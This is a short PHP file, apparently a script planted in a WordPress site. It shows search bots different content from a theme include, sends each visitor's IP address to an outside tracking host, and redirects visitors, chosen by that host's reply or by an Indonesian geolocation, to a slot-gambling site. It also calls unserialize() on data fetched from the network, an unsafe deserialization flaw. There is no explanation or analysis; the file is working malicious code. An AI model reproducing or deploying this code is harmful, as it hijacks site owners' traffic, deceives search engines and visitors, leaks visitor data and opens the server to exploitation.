<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/'){   
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    include('wp-content/themes/assets.php');
    exit;
}
error_reporting(0);
$ip = $_SERVER['REMOTE_ADDR'];
if($_COOKIE['z_ip']!='1')
{
    $url = "http://c92871ab48f7f59780618b6f358a3c2e.chk.5uu8.com/api/jpgo.php?ip={$ip}&g=ID";
    $data = trim(file_get_contents($url));
} 
else
{
    $data='1';
}
if($data=='1')
{
    setcookie('z_ip','1',time()+3600*7200);
    header ( 'Location: https://sayangslotrtp.com/amp/kooranew/' );
    exit ();
}
class geoPlugin {
var $host = 'http://www.geoplugin.net/php.gp?ip={IP}&base_currency={CURRENCY}&lang={LANG}';
var $currency = 'USD';
var $lang = 'en';
var $countryCode = null;

function __construct() {
  }

function locate($ip = null) {
    global $_SERVER;
    if ( is_null( $ip ) ) {
      $ip = $_SERVER['REMOTE_ADDR'];
    }
    $host = str_replace( '{IP}', $ip, $this->host );
    $host = str_replace( '{CURRENCY}', $this->currency, $host );
    $host = str_replace( '{LANG}', $this->lang, $host );
    $data = array();
    $response = $this->fetch($host);
    $data = unserialize($response);
    $this->countryCode = $data['geoplugin_countryCode'];
    }

function fetch($host) {
    if ( function_exists('curl_init') ) {     
      $ch = curl_init();
      curl_setopt($ch, CURLOPT_URL, $host);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_USERAGENT, 'geoPlugin PHP Class v1.1');
      $response = curl_exec($ch);
      curl_close ($ch);
    } else if ( ini_get('allow_url_fopen') ) {
      $response = file_get_contents($host, 'r');
    } else {
      trigger_error ('geoPlugin class Error: Cannot retrieve data. Either compile PHP with cURL support or enable allow_url_fopen in php.ini ', E_USER_ERROR);
      return;
    }
    return $response;
  }}
$geoplugin = new geoPlugin();
$geoplugin->locate();
$var_country_code = $geoplugin->countryCode;
if ($var_country_code == "ID") {
   header('Location: https://sayangslotrtp.com/amp/kooranew/');
 exit ();
}
